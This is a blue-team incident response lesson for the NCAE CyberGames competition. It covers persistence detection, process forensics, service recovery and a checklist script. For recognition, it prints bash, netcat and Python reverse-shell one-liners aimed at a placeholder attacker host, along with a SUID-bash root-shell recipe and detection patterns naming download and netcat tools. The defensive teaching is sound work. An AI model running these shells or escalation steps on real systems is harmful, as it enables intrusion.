Incident Response Under Fire

Your system has been compromised. An attacker is on your network. Services are going down. You have minutes, not hours. Incident response (IR) is the process of detecting, containing, and recovering from a security breach, often while the attack is still happening.

In NCAE CyberGames, red team operators actively attack your network during the competition. They will compromise services, plant backdoors, change passwords, and try to maintain persistent access. Your job is to find what they’ve done, undo it, and keep your services scoring — all under extreme time pressure.

This page teaches the first-15-minutes checklist, the persistence mechanisms attackers most commonly use, process forensics, and step-by-step service recovery procedures.

Prerequisites: You should be comfortable with file permissions, process management, and basic shell scripting from earlier lessons.

1. What is Incident Response?

Incident response has four phases:

Phase	Goal	Time
Detection	Discover that something is wrong	Seconds to minutes
Containment	Stop the bleeding — prevent further damage	Minutes
Eradication	Remove the attacker’s access and tools	Minutes to hours
Recovery	Restore services to normal operation	Minutes to hours

In competition, all four phases happen simultaneously. You can’t take the server offline to investigate — services must keep scoring. This means you need a systematic approach: check the most impactful things first, fix them fast, and move on.

The single biggest mistake teams make is chasing the attacker instead of fixing services. The scoring engine doesn’t care whether you caught the red team. It cares whether your services are up. Fix first, hunt second.

2. The First 15 Minutes

The first 15 minutes after discovering a compromise determine the rest of the engagement. Run through this checklist in order. Each item has the exact command to use.

Check 1: Unauthorized SSH keys

Attackers add their public key to authorized_keys files so they can SSH in without a password — even after you change passwords. Check every user’s authorized_keys:

# Check all authorized_keys files on the system
for user_home in /home/* /root; do
    if [ -f "$user_home/.ssh/authorized_keys" ]; then
        echo "=== $user_home ==="
        cat "$user_home/.ssh/authorized_keys"
    fi
done

If you see keys you don’t recognize, remove them:

# Remove all unauthorized keys (keep only yours)
echo "ssh-ed25519 AAAA... your@email" > /home/youruser/.ssh/authorized_keys
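Overwriting the file is fine when only one key belongs there. When several teammates share an account, filtering against an allowlist keeps every approved key and drops the rest. The following is a minimal sketch, not a definitive tool: prune_keys is a hypothetical helper name, and the allowlist file (one full public-key line per approved key) is an assumption you would prepare before competition.

```shell
# prune_keys ALLOWLIST KEYFILE   (hypothetical helper)
# Keeps only the lines of KEYFILE that appear verbatim in ALLOWLIST.
# The untouched original is saved as KEYFILE.before-prune for your notes.
prune_keys() {
    allowlist=$1
    keyfile=$2
    cp -p "$keyfile" "$keyfile.before-prune"
    # -F fixed strings, -x whole-line match, -f read patterns from a file
    grep -Fxf "$allowlist" "$keyfile.before-prune" > "$keyfile.tmp" || true
    # Write through cat so the existing file keeps its owner and mode
    cat "$keyfile.tmp" > "$keyfile"
    rm -f "$keyfile.tmp"
}
```

Example use, assuming your approved keys are in /root/team_keys.pub: prune_keys /root/team_keys.pub /home/youruser/.ssh/authorized_keys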

Check 2: All crontabs

Cron jobs run on a schedule. Attackers use them to re-establish access, re-open backdoors, or re-download malware:

# Check every user's crontab
for user in $(cut -d: -f1 /etc/passwd); do
    crontab_output=$(crontab -l -u "$user" 2>/dev/null)
    if [ -n "$crontab_output" ]; then
        echo "=== $user ==="
        echo "$crontab_output"
    fi
done

# Check system crontabs
ls -la /etc/cron.d/
cat /etc/crontab
ls -la /etc/cron.daily/ /etc/cron.hourly/

Suspicious signs: cron jobs that download files (wget, curl), run netcat (nc, ncat), or execute scripts from /tmp.
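Reading every cron file by eye is slow. The suspicious signs above can be turned into a single grep, sketched here under the assumption that a pattern match is only a hint and still needs a human look. scan_cron is a hypothetical helper name.

```shell
# scan_cron FILE_OR_DIR...   (hypothetical helper)
# Prints file:line:text for cron entries that download files, run netcat,
# open /dev/tcp sockets, or reference /tmp.
scan_cron() {
    grep -rHnE '(wget|curl|ncat|/dev/tcp|/tmp/|(^|[^[:alnum:]_])nc[[:space:]])' "$@" 2>/dev/null
}
```

Example use: scan_cron /etc/crontab /etc/cron.d /etc/cron.hourly /etc/cron.daily /var/spool/cron. The last path is where user crontabs usually live, but the exact location varies by distribution.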

Check 3: New user accounts

Attackers create new accounts for persistent access:

# Show all users with UID >= 1000 (human accounts)
awk -F: '$3 >= 1000 {print $1, $3, $7}' /etc/passwd

# Show all users with UID 0 (root-equivalent)
awk -F: '$3 == 0 {print $1}' /etc/passwd

If UID 0 shows anything besides root, that’s a backdoor account with full root privileges.

Check 4: SUID binaries

A SUID binary runs with the permissions of its owner, not the user who executes it. If an attacker creates a SUID-root binary, any user can run it and get root access:

# Find SUID binaries outside standard system directories
find / -perm -4000 -type f 2>/dev/null | grep -v -E '^/(usr|bin|sbin)/'

Legitimate SUID binaries normally live under /usr (including /usr/lib and /usr/libexec), /bin, and /sbin. Anything in /tmp, /home, /var, or /opt is suspicious.

Check 5: Listening ports

See what’s listening on the network. Unexpected services mean backdoors:

ss -tulnp

Compare against what should be running. If you see something on port 4444, 5555, or any unusual high port — and it’s not one of your services — investigate the process.
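Comparing against what should be running is easier when the expected ports are written down. Here is a minimal sketch that filters ss output against a list of expected ports. unexpected_ports is a hypothetical helper, and it assumes the column layout of ss -tuln (Netid first, local address in the fifth column).

```shell
# unexpected_ports PORT...   (hypothetical helper)
# Reads `ss -tuln` output on stdin and prints listeners whose local port
# is not among the expected ports given as arguments.
unexpected_ports() {
    awk -v allowed="$*" '
        BEGIN { n = split(allowed, p, " "); for (i = 1; i <= n; i++) ok[p[i]] = 1 }
        $1 == "Netid" { next }               # skip the header row
        {
            k = split($5, part, ":")         # local address is field 5
            port = part[k]                   # port follows the last colon
            if (!(port in ok)) print $1, $5
        }'
}
```

Example use: ss -tuln | unexpected_ports 22 53 445 5432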

Check 6: Running processes

ps aux --forest

The --forest flag shows parent-child relationships, which reveals how processes were spawned. Look for:

Processes running as root that shouldn’t be
Shell processes (/bin/bash, /bin/sh) with no terminal (TTY column shows ?)
Processes with suspicious names or running from /tmp
Netcat (nc, ncat), Python, or Perl processes that look like reverse shells

Check 7: Recently modified files in /etc

find /etc -mmin -60 -type f 2>/dev/null

This shows every file in /etc modified in the last 60 minutes. If the competition just started, any modifications are suspicious. Pay special attention to passwd, shadow, sudoers, and service configs.
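A fixed 60-minute window stops being useful once the competition has run longer than an hour. One alternative, sketched here as an assumption rather than part of the checklist, is to create a marker file at the start and ask find for anything newer. changed_since and the marker path are hypothetical.

```shell
# changed_since MARKER DIR   (hypothetical helper)
# Lists regular files under DIR modified more recently than MARKER.
changed_since() {
    find "$2" -type f -newer "$1" 2>/dev/null
}
```

Example use: run sudo touch /root/.comp-start at the start of competition, then changed_since /root/.comp-start /etc whenever you want the list of changes since then.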

Checkpoint: You find an authorized_keys entry you don't recognize, a cron job that runs wget every 5 minutes, and a new user with UID 0. In what order do you fix these?

Priority order based on severity:

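1. UID 0 user: this gives full root access. Remove immediately: userdel -r backdoor_user. If userdel refuses because the UID is in use by running root processes, delete the account’s line from /etc/passwd with vipw instead.
2. authorized_keys: this gives passwordless SSH access. Remove the key now.
3. Cron job: this will re-infect you. Remove: crontab -r -u affected_user or delete the file from /etc/cron.d/.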

The UID 0 account is most dangerous because it’s root-equivalent. The cron job will undo your fixes if you don’t remove it, but the UID 0 account gives immediate unrestricted access.

3. Persistence Mechanisms

Persistence is how attackers maintain access after initial compromise. They assume you’ll eventually change passwords and restart services — so they plant multiple backdoors that survive these actions.

SSH authorized_keys

How it works: Attacker adds their public key to a user’s ~/.ssh/authorized_keys. Now they can SSH in as that user without knowing the password.

Detection:

# Check all authorized_keys files
find / -name "authorized_keys" -exec echo "=== {} ===" \; -exec cat {} \; 2>/dev/null

Removal: Delete unauthorized keys. Verify by comparing against your team’s known public keys.

Cron jobs

How it works: A cron job runs on a schedule (e.g., every 5 minutes) and re-downloads malware, re-opens a reverse shell, or re-adds the attacker’s SSH key.

Detection:

# All user crontabs
for user in $(cut -d: -f1 /etc/passwd); do echo "--- $user ---"; crontab -l -u "$user" 2>/dev/null; done

# System cron directories
ls -la /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.weekly/ /etc/cron.monthly/
cat /etc/crontab

Removal:

crontab -r -u compromised_user    # Remove user's entire crontab
rm /etc/cron.d/suspicious_file    # Remove system cron entry
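crontab -r deletes the user's whole crontab, including any legitimate jobs. If the account also runs jobs you need, a filter can drop only the malicious lines. This is a minimal sketch. drop_cron_lines is a hypothetical helper, and the pattern you pass is your own judgment call.

```shell
# drop_cron_lines PATTERN   (hypothetical helper)
# Filter: copies stdin to stdout minus lines matching the extended regex.
drop_cron_lines() {
    # grep exits 1 when every line was dropped; that is not an error here
    grep -vE "$1" || true
}
```

Example use: crontab -l -u compromised_user | drop_cron_lines 'wget|/tmp/' | crontab -u compromised_user -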

Systemd services and timers

How it works: Attacker creates a systemd service that starts on boot, or a timer that fires periodically. These survive reboots and are harder to spot than cron jobs.

Detection:

# List all enabled services (look for unfamiliar names)
systemctl list-unit-files --state=enabled

# List all active timers
systemctl list-timers --all

# Check for recently created unit files
find /etc/systemd/system/ /usr/lib/systemd/system/ -mmin -120 -type f 2>/dev/null

Removal:

sudo systemctl stop malicious.service
sudo systemctl disable malicious.service
sudo rm /etc/systemd/system/malicious.service
sudo systemctl daemon-reload
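Unfamiliar unit names are one signal. What the unit actually executes is another. The sketch below greps unit files for Exec lines that point at world-writable paths or common download and shell tools. scan_units is a hypothetical helper, and its pattern list is an assumption that will miss anything named differently.

```shell
# scan_units DIR...   (hypothetical helper)
# Prints Exec* lines in unit files that reference /tmp-style paths,
# /dev/tcp sockets, downloaders, netcat, or an interactive bash.
scan_units() {
    grep -rHnE '^Exec(Start|StartPre|StartPost|Stop)=.*(/tmp/|/var/tmp/|/dev/shm/|/dev/tcp/|wget|curl|ncat|bash -i)' "$@" 2>/dev/null
}
```

Example use: scan_units /etc/systemd/system /usr/lib/systemd/system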

New user accounts

How it works: Attacker creates a new user, sometimes with UID 0 (root-equivalent). Changing the root password doesn’t affect this account.

Detection:

# Users with UID 0 (should only be root)
awk -F: '$3 == 0 {print $1}' /etc/passwd

# Regular accounts (UID >= 1000); newly created ones usually have the highest UIDs
awk -F: '$3 >= 1000 {print $1, $3}' /etc/passwd

# Users with login shells (can SSH in)
grep -v '/nologin\|/false' /etc/passwd

Removal:

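sudo userdel -r backdoor_user
# A UID 0 account usually makes userdel refuse (UID in use by PID 1); remove its line with: sudo vipw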
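The UID 0 check generalizes: any two accounts sharing a UID are the same user as far as the kernel is concerned. A minimal sketch that reports every shared UID follows. shared_uids is a hypothetical helper name.

```shell
# shared_uids PASSWD_FILE   (hypothetical helper)
# Prints each UID used by more than one account, with the account names.
shared_uids() {
    awk -F: '
        { names[$3] = (names[$3] == "" ? $1 : names[$3] "," $1); count[$3]++ }
        END { for (uid in count) if (count[uid] > 1) print uid ": " names[uid] }
    ' "$1"
}
```

Example use: shared_uids /etc/passwd. On a clean system this should print nothing.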

SUID binaries

How it works: Attacker copies /bin/bash somewhere and sets the SUID bit. Now any user can run it and get a root shell:

# What the attacker does:
cp /bin/bash /tmp/.hidden_shell
chmod u+s /tmp/.hidden_shell
# Now any user runs: /tmp/.hidden_shell -p  → root shell

Detection:

find / -perm -4000 -type f 2>/dev/null | grep -v -E '^/(usr|bin|sbin)/'

Removal:

rm /tmp/.hidden_shell    # Delete the binary entirely
# Or remove just the SUID bit:
chmod u-s /path/to/suspicious_binary

Modified .bashrc / .profile

How it works: Attacker adds a command to a user’s .bashrc or .profile. It runs every time that user logs in or opens a new shell.

Detection:

# Check root's and all users' shell startup files
for user_home in /home/* /root; do
    for rc in .bashrc .profile .bash_profile .bash_login; do
        if [ -f "$user_home/$rc" ]; then
            echo "=== $user_home/$rc ==="
            tail -5 "$user_home/$rc"
        fi
    done
done

Look for lines that run netcat, curl, wget, or execute files from /tmp.

Removal: Edit the file and remove the malicious lines.
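tail -5 only shows the end of each file, and a malicious line can sit anywhere. A sketch that greps the whole of each startup file for the same signs is shown here. scan_rc is a hypothetical helper, and a match is a prompt to read the file, not proof of compromise.

```shell
# scan_rc HOME_DIR...   (hypothetical helper)
# Greps every line of each shell startup file for download tools, netcat,
# /dev/tcp sockets, and /tmp paths. Prints file:line:text for each hit.
scan_rc() {
    for home in "$@"; do
        for rc in .bashrc .profile .bash_profile .bash_login; do
            [ -f "$home/$rc" ] || continue
            grep -HnE '(wget|curl|ncat|/dev/tcp/|/tmp/|(^|[^[:alnum:]_])nc[[:space:]])' "$home/$rc"
        done
    done
    return 0
}
```

Example use: scan_rc /home/* /root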

Reverse shells

How it works: A reverse shell connects back to the attacker’s machine, giving them a command line. Common variants:

# Bash reverse shell (what the attacker runs on your machine)
bash -i >& /dev/tcp/attacker_ip/4444 0>&1

# Netcat reverse shell
nc attacker_ip 4444 -e /bin/bash

# Python reverse shell
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("attacker_ip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

Detection:

# Look for processes with network connections to unexpected IPs
ss -tupn | grep ESTAB

# Look for bash/sh/python/perl/netcat processes without a terminal (TTY is ?)
ps -eo pid,user,tty,args | awk '$3 == "?"' | grep -wE 'bash|sh|python3?|perl|nc|ncat'

Removal: Kill the process:

kill -9 <PID>

Then find and remove whatever restarts it (cron, systemd, .bashrc).
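To narrow "unexpected IPs" down quickly, you can filter established connections by peer address. This is a minimal sketch, assuming the column layout of ss -tupn (state in column 2, peer address in column 6) and that your team network shares one address prefix. foreign_peers is a hypothetical helper.

```shell
# foreign_peers PREFIX   (hypothetical helper)
# Reads `ss -tupn` output on stdin and prints established connections whose
# peer address does not start with PREFIX (for example "10.0.5.").
foreign_peers() {
    awk -v prefix="$1" '
        $2 == "ESTAB" && index($6, prefix) != 1 {
            print $6 ($7 != "" ? " " $7 : "")
        }'
}
```

Example use: ss -tupn | foreign_peers 10.0.5. Loopback connections (127.0.0.1) also show up, so expect a little noise.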

Checkpoint: You kill a reverse shell process, but 5 minutes later it's back. What's restarting it?

Something is persisting the reverse shell. Check in this order:

1. Cron: crontab -l for all users, check /etc/cron.d/
2. Systemd timer: systemctl list-timers --all
3. .bashrc/.profile: check whether the reverse shell command is in a startup file (runs on next login)
4. Another process: a parent process might be re-spawning it. Check ps aux --forest for parent-child relationships.

The answer is almost always cron. Kill the reverse shell AND remove the cron job.

4. Process Forensics

When you spot a suspicious process, investigate it before killing it. Understanding what it does tells you what else the attacker might have done.

Investigate a running process

# See all processes in a tree (parent-child relationships)
ps aux --forest

Sample output showing a reverse shell:

root      1234  0.0  0.1  12345  6789 ?   Ss   10:00   0:00 /usr/sbin/sshd
root      2345  0.0  0.1  12345  6789 ?   Ss   10:05   0:00  \_ sshd: attacker [priv]
attacker  2346  0.0  0.1  12345  6789 ?   S    10:05   0:00      \_ sshd: attacker@notty
attacker  2347  0.0  0.0   4567  1234 ?   S    10:05   0:00          \_ bash -i
attacker  2400  0.0  0.0   3456   890 ?   S    10:06   0:00              \_ nc 172.16.99.1 4444 -e /bin/bash

This tells the story: someone SSH’d in as “attacker”, opened a bash shell, and started a netcat reverse shell to 172.16.99.1.

Dig deeper with /proc

Every running process has a directory under /proc/<PID>/ containing everything about it:

PID=2400    # The suspicious process

# How was the process started? (full command line)
cat /proc/$PID/cmdline | tr '\0' ' '

# What binary is actually running? (symlink to the executable)
ls -la /proc/$PID/exe

# What files does it have open?
ls -la /proc/$PID/fd/

# What is its working directory?
ls -la /proc/$PID/cwd

# What environment variables does it have?
cat /proc/$PID/environ | tr '\0' '\n'
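The /proc reads above can be bundled into one function so the result is easy to paste into your team's notes. This is a sketch under the assumption that you run it as root (other users' /proc entries are not fully readable otherwise). proc_snapshot is a hypothetical helper name.

```shell
# proc_snapshot PID   (hypothetical helper)
# Prints the key /proc facts for one process in a compact, copyable form.
proc_snapshot() {
    pid=$1
    [ -d "/proc/$pid" ] || { echo "no such process: $pid" >&2; return 1; }
    echo "pid:     $pid"
    echo "cmdline: $(tr '\0' ' ' < "/proc/$pid/cmdline")"
    echo "exe:     $(readlink "/proc/$pid/exe" 2>/dev/null)"
    echo "cwd:     $(readlink "/proc/$pid/cwd" 2>/dev/null)"
    echo "fds:     $(ls "/proc/$pid/fd" 2>/dev/null | wc -l)"
}
```

Example use: proc_snapshot 2400 | tee -a ir-notes.txt (the notes file name is an assumption).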

lsof — List Open Files

lsof shows all resources a process is using: files, sockets, pipes:

# All resources for a specific process
lsof -p 2400

# Just network connections for a process (-a ANDs the two filters; without it lsof ORs them)
lsof -a -i -p 2400

Identifying a reverse shell from ps output

Red flags in ps aux output:

Sign	What it means
`?` in the TTY column	No terminal attached — process is running in background, possibly a daemon or backdoor
`bash -i` or `sh -i`	Interactive shell, suspicious if TTY is `?`
`nc`, `ncat`, `socat` with an IP	Netcat connecting to a remote host — almost certainly a reverse shell
`python -c 'import socket...'`	Python reverse shell one-liner
Process running from `/tmp`	Binaries in /tmp are always suspicious
Unknown username	Account you didn’t create
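Several of the red flags in the table above can be checked mechanically. The sketch below is a rough first-pass filter, not a detector: it assumes input in the format of ps -eo user,pid,tty,args, and flag_procs is a hypothetical helper name.

```shell
# flag_procs   (hypothetical helper)
# Reads `ps -eo user,pid,tty,args` output on stdin and prints rows that
# match a red flag, prefixed with the reason.
flag_procs() {
    awk '
        NR == 1 && $2 == "PID" { next }                          # header row
        { cmd = $0; sub(/^ *[^ ]+ +[^ ]+ +[^ ]+ +/, "", cmd) }   # args = everything after the first 3 columns
        cmd ~ /^\/tmp\//                               { print "tmp-binary: " $0; next }
        cmd ~ /^([^ ]*\/)?(nc|ncat|socat) /            { print "netcat: " $0; next }
        cmd ~ /import socket/                          { print "python-socket: " $0; next }
        $3 == "?" && cmd ~ /^([^ ]*\/)?-?(bash|sh)( -i)?$/ { print "shell-no-tty: " $0; next }
    '
}
```

Example use: ps -eo user,pid,tty,args | flag_procs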

The forensics workflow

1. Spot it: ps aux --forest and ss -tupn
2. Investigate it: /proc/<PID>/cmdline, /proc/<PID>/exe, lsof -p <PID>
3. Record it: Write down the PID, command, user, connections (for your team’s notes)
4. Kill it: kill -9 <PID>
5. Find persistence: What restarts this process? Check cron, systemd, .bashrc
6. Remove persistence: Delete the mechanism that relaunches it

Checkpoint: ps shows a process running as root with command "/tmp/.x" and no terminal. /proc/PID/exe points to /tmp/.x. What are your next steps?

1. Check what it is: file /tmp/.x (is it a compiled binary, a script, or a known shell?)
2. Check connections: lsof -a -i -p <PID> (is it connecting to an external IP?)
3. Check /proc/PID/fd: What files does it have open?
4. Kill it: kill -9 <PID>
5. Remove the binary: rm /tmp/.x
6. Find persistence: How did it start? Check cron, systemd timers, .bashrc, and look for a parent process in ps aux --forest.
7. Check for more: Attacker may have planted similar binaries elsewhere. Run find /tmp /var/tmp /dev/shm -type f -executable 2>/dev/null.

5. Service Recovery Drill

When red team breaks your services, you need to restore them fast. Here are step-by-step recovery procedures for SSH, PostgreSQL, and DNS; SMB recovery is covered in the SMB lesson.

SSH Recovery

# Step 1: Check if sshd is running
systemctl status sshd

# Step 2: Restore config from backup (if you made one)
sudo cp /etc/ssh/sshd_config.bak /etc/ssh/sshd_config
# Or restore critical settings manually:
sudo sed -i 's/^PermitRootLogin.*/PermitRootLogin no/' /etc/ssh/sshd_config
sudo sed -i 's/^PasswordAuthentication.*/PasswordAuthentication yes/' /etc/ssh/sshd_config

# Step 3: Fix permissions (sshd is strict about these)
sudo chmod 644 /etc/ssh/sshd_config
sudo chmod 600 /etc/ssh/ssh_host_*_key
sudo chmod 644 /etc/ssh/ssh_host_*_key.pub

# Step 4: Test config syntax
sudo sshd -t

# Step 5: Restart
sudo systemctl restart sshd

# Step 6: Verify
ssh localhost
ss -tulnp | grep :22
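Steps 2 and 4 can be combined so that a bad backup never stays in place. The sketch below restores a file, runs a validator you supply, and rolls back if validation fails. restore_checked is a hypothetical helper, it assumes the target file still exists, and it must run from a root shell.

```shell
# restore_checked BACKUP TARGET VALIDATOR [ARGS...]   (hypothetical helper)
# Restores BACKUP over TARGET, runs the validator command, and rolls back
# to the pre-restore contents if the validator fails.
restore_checked() {
    backup=$1; target=$2; shift 2
    cp -p "$target" "$target.pre-restore" || return 1
    cat "$backup" > "$target" || return 1      # keeps TARGET's owner and mode
    if "$@"; then
        echo "restored $target"
    else
        cat "$target.pre-restore" > "$target"
        echo "validation failed; rolled back $target" >&2
        return 1
    fi
}
```

Example use: restore_checked /etc/ssh/sshd_config.bak /etc/ssh/sshd_config sshd -t && systemctl restart sshd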

PostgreSQL Recovery

# Step 1: Check if PostgreSQL is running
systemctl status postgresql

# Step 2: Restore pg_hba.conf (authentication config)
# This file controls who can connect and how they authenticate
sudo cp /var/lib/pgsql/data/pg_hba.conf.bak /var/lib/pgsql/data/pg_hba.conf
# Or fix manually --- this allows local and network password auth:
# local  all  all                 md5
# host   all  all  10.0.5.0/24   md5

# Step 3: Fix ownership and permissions
sudo chown postgres:postgres /var/lib/pgsql/data/pg_hba.conf
sudo chmod 640 /var/lib/pgsql/data/pg_hba.conf

# Step 4: Restart
sudo systemctl restart postgresql

# Step 5: Verify (test a connection)
psql -h localhost -U postgres -c "SELECT 1;"
ss -tulnp | grep :5432

DNS Recovery

# Step 1: Check if named is running
systemctl status named

# Step 2: Restore named.conf from backup
sudo cp /etc/named.conf.bak /etc/named.conf

# Step 3: Restore zone files from backup
sudo cp /var/named/team5.cyber.local.zone.bak /var/named/team5.cyber.local.zone

# Step 4: Validate both configs
sudo named-checkconf
sudo named-checkzone team5.cyber.local /var/named/team5.cyber.local.zone

# Step 5: Fix ownership
sudo chown named:named /var/named/team5.cyber.local.zone

# Step 6: Restart
sudo systemctl restart named

# Step 7: Verify
dig @localhost team5.cyber.local
ss -tulnp | grep :53

The backup lesson

Every recovery procedure above restores from a backup, so the backup has to exist before you need it. Make backups in the first 5 minutes of competition, before red team touches anything:

# Run this FIRST THING in competition
sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak
sudo cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
sudo cp /etc/named.conf /etc/named.conf.bak
sudo cp /var/named/team5.cyber.local.zone /var/named/team5.cyber.local.zone.bak
sudo cp /var/lib/pgsql/data/pg_hba.conf /var/lib/pgsql/data/pg_hba.conf.bak
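A .bak file next to the original is easy for an attacker to find and edit. One hedged variation is to copy the files into a separate directory and record checksums, so you can later tell whether a live config has changed. backup_configs and the destination path are hypothetical, and file paths are assumed to be absolute.

```shell
# backup_configs DEST FILE...   (hypothetical helper)
# Copies each existing FILE into DEST (mirroring its absolute path) and
# appends its SHA-256 checksum to DEST/SHA256SUMS.
backup_configs() {
    dest=$1; shift
    mkdir -p "$dest"
    for f in "$@"; do
        [ -f "$f" ] || { echo "skip (missing): $f" >&2; continue; }
        mkdir -p "$dest$(dirname "$f")"
        cp -p "$f" "$dest$f"
        sha256sum "$f" >> "$dest/SHA256SUMS"
    done
}
```

Example use from a root shell: backup_configs /root/ir-backup /etc/ssh/sshd_config /etc/samba/smb.conf /etc/named.conf. Later, sha256sum -c --quiet /root/ir-backup/SHA256SUMS lists only the files that no longer match.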

6. The IR Script

This script automates the first-15-minutes checklist. Save it, make it executable, and run it the moment you suspect a compromise:

#!/usr/bin/env bash
# ir-check.sh — First-15-minutes incident response checklist
# Usage: sudo ./ir-check.sh

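# No -e or pipefail: a failed check (for example, grep finding nothing)
# must not abort the rest of the report.
set -u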

echo "=========================================="
echo "  INCIDENT RESPONSE CHECKLIST"
echo "  $(date)"
echo "=========================================="

echo ""
echo "[1] AUTHORIZED_KEYS FILES"
echo "---"
for home in /home/* /root; do
    [ -f "$home/.ssh/authorized_keys" ] && echo "$home:" && cat "$home/.ssh/authorized_keys"
done

echo ""
echo "[2] CRONTABS (all users)"
echo "---"
for user in $(cut -d: -f1 /etc/passwd); do
    output=$(crontab -l -u "$user" 2>/dev/null) && echo "$user: $output"
done
echo "System cron.d:"
ls -la /etc/cron.d/ 2>/dev/null

echo ""
echo "[3] USERS WITH UID 0 (root-equivalent)"
echo "---"
awk -F: '$3 == 0 {print $1}' /etc/passwd

echo ""
echo "[4] USERS WITH UID >= 1000"
echo "---"
awk -F: '$3 >= 1000 {print $1, $3, $7}' /etc/passwd

echo ""
echo "[5] SUID BINARIES (non-standard paths)"
echo "---"
suid_hits=$(find / -perm -4000 -type f 2>/dev/null | grep -v -E '^/(usr|bin|sbin)/' || true)
echo "${suid_hits:-(none found)}"

echo ""
echo "[6] LISTENING PORTS"
echo "---"
ss -tulnp

echo ""
echo "[7] PROCESS TREE"
echo "---"
ps aux --forest

echo ""
echo "[8] RECENTLY MODIFIED FILES IN /etc (last 60 min)"
echo "---"
recent=$(find /etc -mmin -60 -type f 2>/dev/null || true)
echo "${recent:-(none found)}"

echo ""
echo "[9] ESTABLISHED CONNECTIONS"
echo "---"
ss -tupn | grep ESTAB || echo "(none found)"

echo ""
echo "[10] ACTIVE SYSTEMD TIMERS"
echo "---"
systemctl list-timers --all --no-pager 2>/dev/null

echo ""
echo "=========================================="
echo "  CHECKLIST COMPLETE — Review output above"
echo "=========================================="

Make it executable and run it:

chmod +x ir-check.sh
sudo ./ir-check.sh | tee ir-report-$(date +%H%M).txt

The tee command saves the output to a timestamped file while also displaying it on screen. Run this multiple times during competition to track changes.
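Tracking changes between runs is easier with a diff than by reading two reports side by side. Here is a minimal sketch that prints lines present in the newer report but not the older one. report_delta is a hypothetical helper, and the process-tree section will always produce some noise.

```shell
# report_delta OLD NEW   (hypothetical helper)
# Prints lines that appear in NEW but not in OLD, ignoring line order.
report_delta() {
    old_sorted=$(mktemp); new_sorted=$(mktemp)
    sort -u "$1" > "$old_sorted"
    sort -u "$2" > "$new_sorted"
    comm -13 "$old_sorted" "$new_sorted"    # column 3 suppressed, column 1 suppressed: NEW-only lines
    rm -f "$old_sorted" "$new_sorted"
}
```

Example use: report_delta ir-report-1005.txt ir-report-1020.txt (file names follow the pattern from the tee command above; the times are made up).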

7. Triage Under Time Pressure

When multiple things are broken and red team is still active, you need a decision framework. Not everything is equally important.

Service priority by scoring weight

Priority	Service	Weight	Fix first?
1	SMB Login	3x	Always first
2	SSH	2x	Second
3	DNS	2x	Second (tied with SSH)
4	Web, FTP, etc.	1x	After high-weight services
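The table above boils down to a sort by weight. As a small illustration, assuming you keep a scratch list of "service weight status" lines (a format invented for this sketch), the fix order can be computed like this. triage_order is a hypothetical helper.

```shell
# triage_order   (hypothetical helper)
# Reads "service weight status" lines on stdin and prints the services
# that are down, highest scoring weight first.
triage_order() {
    awk '$3 == "down" { print $2, $1 }' \
        | sort -s -k1,1nr \
        | awk '{ print $2 " (" $1 "x)" }'
}
```

Example use: printf 'smb 3 down\nssh 2 up\ndns 2 down\n' | triage_order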

The triage loop

1. Run ir-check.sh (2 minutes)
2. Fix highest-weight broken service (3-5 minutes)
3. Remove persistence mechanisms found in step 1 (2-3 minutes)
4. Verify services are scoring (1 minute)
5. Go back to step 1

What NOT to do

Bad move	Why it fails
Chasing red team through logs	You lose points while services are down
Rebooting the server	Kills all active sessions — including yours
Changing all passwords at once	You lose access before setting up alternatives
Installing new software during competition	Wastes time and may break dependencies
Panicking and making random changes	Unclear state makes debugging impossible

What TO do

Good move	Why it works
Fix services before hunting	Points accumulate while you investigate
Use your backup configs	30-second restore vs 10-minute debugging
Run ir-check.sh after every fix	Catches re-infection immediately
Divide work across team members	One person fixes services, another hunts persistence
Document what you find	Build a timeline so you can predict what red team will do next

Checkpoint: SMB is down (3x weight), SSH is compromised (someone changed the root password), and you found a cron-based reverse shell. You have one person. What do you fix first?

SMB first. It’s worth 3x. Get it scoring by following the quick recovery procedure from the SMB lesson. Then kill the reverse shell and remove the cron job (takes 30 seconds). Then deal with SSH — change the root password back, verify sshd_config, restart. The reverse shell is dangerous, but if you fix SMB and then immediately kill the shell, you’ve minimized both point loss and attacker access.

Exercises

IR Drill: Set up a practice VM with three backdoors: an authorized_keys entry, a cron job reverse shell, and a SUID bash in /tmp. Run ir-check.sh and identify all three. Remove them in under 5 minutes.
Process Forensics Lab: Start a fake reverse shell on a practice VM (ncat -e /bin/bash your_ip 4444). From a second terminal, use ps aux --forest, /proc/<PID>/cmdline, /proc/<PID>/exe, lsof -p, and ss -tupn to fully investigate it. Write a one-paragraph forensics report.
Service Recovery Race: Set up SSH, Samba, and DNS on a practice VM. Have a partner break one service (stop it, corrupt the config, change a password). Time yourself restoring it using the recovery procedures in this lesson (and the SMB lesson for Samba). Target: under 3 minutes.
Persistence Gauntlet: Have a partner plant 5 persistence mechanisms on a practice VM (one from each category: authorized_keys, cron, systemd service, new user, SUID binary). Find and remove all 5 in under 10 minutes.

Resources

Practice: BlueTeamLabs Online (incident response challenges) · CyberDefenders (forensics and IR)

Reference: NIST Incident Response Guide (SP 800-61) · SANS Incident Handler’s Handbook

Video: John Hammond — IR and forensics · NCAE CyberGames competition walkthroughs